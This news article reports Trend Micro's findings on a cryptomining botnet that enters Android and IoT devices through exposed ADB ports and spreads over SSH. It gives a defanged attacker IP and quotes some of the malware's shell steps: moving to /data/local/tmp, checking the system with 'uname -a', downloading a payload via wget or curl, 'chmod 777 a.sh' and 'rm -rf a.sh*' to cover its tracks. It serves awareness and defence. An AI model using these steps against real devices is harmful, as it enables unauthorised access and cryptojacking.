Android devices using SSH are quickly falling victim to a new crypto mining malware. Cybersecurity firm Trend Micro found the botnet which is infecting users in 21 countries.
New botnets target vulnerable devices
Trend Micro suggests that the malware enters devices using the Android Debug Bridge (ADB) ports. The ADB ports are designed to help to resolve defective apps in Androids. Once the malware enters the device, it uses SSH to spread and affect all devices that were connected to the host previously. It could spread in both Android phones as well as the Internet of Things (IoT) devices.
The malware is currently active in 21 countries, but South Korea has the highest number of infected devices according to Trend Micro. The cybersecurity firm said that an IP address 45[.]67[.]14[.]179 is used to connect to the ADB devices running on the system. It is then used to conduct several activities on the device. The attack begins when the ADB command shell changes the devices working directory to /data/local/tmp. The firm explained that .tmp files have default permissions to execute on a system, which makes the attacker’s work easier. The malware, once executed, runs a wide array of commands on the system to start crypto mining. It can also hide from being discovered.
How is the bot harming users?
After execution, the blot decides the type of system it has entered and decides whether it is a honeypot. It uses the command ‘uname -a’ to make this decision. It downloads the payload using wget. If wget is unavailable, it uses curl in the system. After the payload is downloaded, the malware issues a “chmod 777 a.sh” command to change permissions setting of the payload. When this command is executed, the malware deletes its traces by using the “rm -rf a.sh*” command.
Crypto jacking has become a common practice amongst hackers, and cybersecurity firm McAfee detected a 4,000% rise in such attacks in 2018. Trend Micro’s report from earlier this month suggests that a malicious URL is used to infect devices with a Monero mining botnet. The attacks look eerily similar to those used by the Outlaw hacking group.
Crypto jacking software is also getting more sophisticated with time. The recent malware detected by Trend Micro can delete its traces and can hide in the device with ease. Last month, there was news about an infamous crypto mining malware called Shelbot, which updated to hack more mining power. The malware could shut down other processes on infected devices and help the miner gain more processing power for its own processes.